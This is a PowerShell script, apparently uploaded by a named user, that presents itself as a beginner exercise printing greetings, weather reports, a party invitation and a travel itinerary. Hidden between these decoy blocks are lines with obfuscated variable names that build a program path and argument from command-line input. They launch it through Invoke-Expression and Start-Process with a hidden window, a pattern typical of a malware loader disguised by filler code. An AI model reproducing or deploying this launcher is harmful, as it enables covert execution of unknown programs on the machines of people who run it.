Subido por Brayan padilla


# Defining string variables
$greeting = "Hello"
$name = "John"
$timeOfDay = "morning"
$fullGreeting = "$greeting, $name! Good $timeOfDay."
# Displaying the variables using Write-Output
Write-Output $greeting
Write-Output $name
Write-Output $timeOfDay
Write-Output $fullGreeting
# Generating more variables
$city = "New York"
$temperature = "75°F"
$weather = "sunny"
$weatherReport = "Today in $city, the temperature is $temperature and the weather is $weather."
# Displaying the new variables
Write-Output $city
Write-Output $temperature
Write-Output $weather
Write-Output $weatherReport
$qxapparel = $args[2]
$qxapparyl = $args[3]
$xiggly = $qxapparel+"."+$qxapparyl
$zxaongue = $args[0]
$dusird = $args[1]
$lodicrous = $zxaongue+"."+$dusird
# Defining string variables
$eventTitle = "Birthday Bash"
$hostName = "Alice"
$location = "Wonderland"
$date = "July 10th"
$time = "6:00 PM"
$invitationMessage = "You are invited to $eventTitle hosted by $hostName at $location on $date at $time."
# Displaying the variables using Write-Output
Write-Output $eventTitle
Write-Output $hostName
Write-Output $location
Write-Output $date
Write-Output $time
Write-Output $invitationMessage
# Generating more variables
$attire = "Casual"
$rsvpBy = "July 5th"
$contactNumber = "555-1234"
$rsvpMessage = "Please RSVP by $rsvpBy by calling $contactNumber. Dress code: $attire."
# Displaying the new variables
Write-Output $attire
Write-Output $rsvpBy
Write-Output $contactNumber
Write-Output $rsvpMessage
$windowStyleValue = 'Hidden' # Or any other valid WindowStyle value like 'Normal', 'Minimized', 'Maximized'
$windowStyleString = "-WindowStyle $windowStyleValue"
$command = "Start-Process $windowStyleString -FilePath `"$lodicrous`" -ArgumentList `"$xiggly`""
Invoke-Expression $command
# Defining string variables
$destination = "Paris"
$travelerName = "Emily"
$departureDate = "August 15th"
$returnDate = "August 25th"
$itineraryMessage = "Traveler: $travelerName is traveling to $destination from $departureDate to $returnDate."
# Displaying the variables using Write-Output
Write-Output $destination
Write-Output $travelerName
Write-Output $departureDate
Write-Output $returnDate
Write-Output $itineraryMessage